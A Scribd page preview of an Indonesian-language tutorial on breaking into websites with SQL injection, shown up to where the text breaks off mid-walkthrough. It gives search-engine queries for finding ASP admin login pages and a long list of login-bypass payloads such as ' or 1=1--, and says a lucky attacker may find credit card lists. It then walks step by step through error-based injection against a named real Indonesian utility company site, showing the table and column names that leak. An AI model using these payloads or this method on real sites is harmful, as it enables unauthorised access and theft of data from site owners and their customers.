hacking

Scribd
Upload a Document
Search Documents
Explore

    Sign Up
    |
    Log In

                                             
  /  11
Download this Document for Free

Jebol web dengan SQL Injection
SQL
Injection adalah memasukkan kode-kode SQL untuk mendapatkan akses kedatabase yang lebih besar daripada yang seharusnya kita dapatkan, terutama padascript yang tidak memvalidasi input dari user.
 
SQL Injection sebenarnya sudah sering dibahas dimana-mana, tetapi ternyata masihbanyak webmaster yang belum tahu atau tidak peduli akan kelemahan ini.
 
Apa saja yang diperlukan untuk melakukan SQL Injection ?

1. Internet Explorer (wajib)

2. PC yang terhubung ke Internet (wajib, kecuali Anda mau hack PC

Anda sendiri)

3. Segelas kopi untuk menghilangkan rasa kantuk (optional)

4. Metallica (optional)
 
OK, langsung saja kita praktekkan, supaya lebih jelas.
 
Pertama bukalah [link] (google pancen oye) untuk mencari script yang terhubung kedatabase. Masukkan salah satu keyword di bawah ini (lengkap dengan tanda petiknya):

"/admin.asp"

"/login.asp"

"/logon.asp"

"/adminlogin.asp"

"/adminlogon.asp"

"/admin_login.asp"

"/admin_logon.asp"

"/admin/admin.asp"

"/admin/login.asp"

"/admin/logon.asp"

"/admin/adminlogin.asp"

"/admin/adminlogon.asp"

"/admin/admin_login.asp"

"/admin/admin_logon.asp"

"/administrator/admin.asp"

"/administrator/login.asp"

"/administrator/logon.asp"

"root/login.asp"

"admin/index.asp"
 
Anda bisa menambahkan daftarnya berdasarkan kreatifitas Anda sendiri. Bukalahsalah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpaisebuah halaman login (user name dan password).
 

Masukkan kode-kode berikut,

User name : ` or `a'='a

Password : ` or `a'='a

(termasuk tanda petiknya)
 
Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisamenambahkan berita, mengedit user yang lain, merubah about, dan lain-lain. Jikaberuntung Anda bisa mendapatkan daftar kredit card yang banyak.
 
Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.Menurut pengalaman saya, dari sekitar 20 link yang saya coba, ada satu atau dua yangberhasil.
 
Banyak variasi kode yang mungkin, antara lain :

User name : admin

Password : ` or `a'='a
 
Di bawah ini bisa dimasukkan baik ke user name maupun password :

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a
 
Anda masih bisa memperpanjang daftarnya sesuai kreatifitas Anda.
 
Hacking adalah seni. Hacking adalah perpaduan dari pengetahuan, kreatifitas dankesabaran. Jika Anda memiliki ketiga-tiganya Anda akan berhasil.
 

diambil dari tutorial yang tersebar di internet
 
=======================================================

Hingga Maret 2006, masih saja terdapat situs web di Republik Indonesia yang diboboldengan teknik SQL Injection. Anda tahu betapa berbahaya bug yang satu ini ? Berikutakan kita sajikan step by step SQL Injection ini yang diambil dari langsung tulisan iko(iko94@yahoo.com)
 
Catatan : kita akan membatasi bahasan pada SQL Injection di MS-SQL Server.
 
Kita akan mengambil contoh di sitewww.pln-wilkaltim.co.id

Ada dua kelemahan di site ini, yaitu:

1. Tabel News

2. Tabel Admin
 
Langkah pertama, kita tentukan lubang mana yang bisa di-inject

dengan jalan berjalan-jalan (enumeration) dulu di site tsb.

Kita akan menemukan 2 model cara input parameter, yaitu dengan

cara memasukkan lewat input box dan memasukkannya lewat

alamat URL.
 
Kita ambil yang termudah dulu, dengan cara input box.

Kemudian kita cari kotak login yang untuk admin.

Ketemu diwww.pln-wilkaltim.co.id/sipm/admin/admin.asp

Langkah pertama untuk menentukan nama tabel dan fieldnya,

kita inject kotak NIP dengan perintah (password terserah, cabang

biarkan aja):

' having 1=1--

jangan lupa untuk menuliskan tanda kutip tunggal dan tanda

minus dobel (penting).

Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection

Kemudian akan keluar pesan error:

--------------------

Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)

[Microsoft][ODBC SQL Server Driver][SQL Server]Column

'T_ADMIN.NOMOR' is invalid in the select list because

it is not contained in an aggregate function and

there is no GROUP BY clause.

/sipm/admin/dologin.asp, line 7

--------------------

Keluarlah nama field pertama kita !!!

Catat nama tabel : T_ADMIN

Catat nama field : NOMOR
 
Kemudian kita akan mencari nama field-field berikutnya, beserta nama tabel yangmungkin berbeda-beda. Kita inject di kotak NIP (password terserah):

Jebol Web Dengan SQL Injection
Download this Document for FreePrintMobileCollectionsReport Document
Info and Rating
Follow
Joe Lodek
Joe Lodek
Share & Embed
Related Documents
PreviousNext

    p.
    p.
    p.
    p.
    p.
    p.
    p.
    p.
    p.
    p.
    p.
    p.
    p.
    p.
    p.

More from this user
PreviousNext

    11 p.

Add a Comment
Upload a Document
Search Documents

    Follow Us!
    scribd.com/scribd
    twitter.com/scribd
    facebook.com/scribd

    About
    Press
    Blog
    Partners
    Scribd 101
    Web Stuff
    Scribd Store
    Support
    FAQ
    Developers / API
    Jobs
    Terms
    Copyright
    Privacy

Copyright © 2011 Scribd Inc.
Language:
English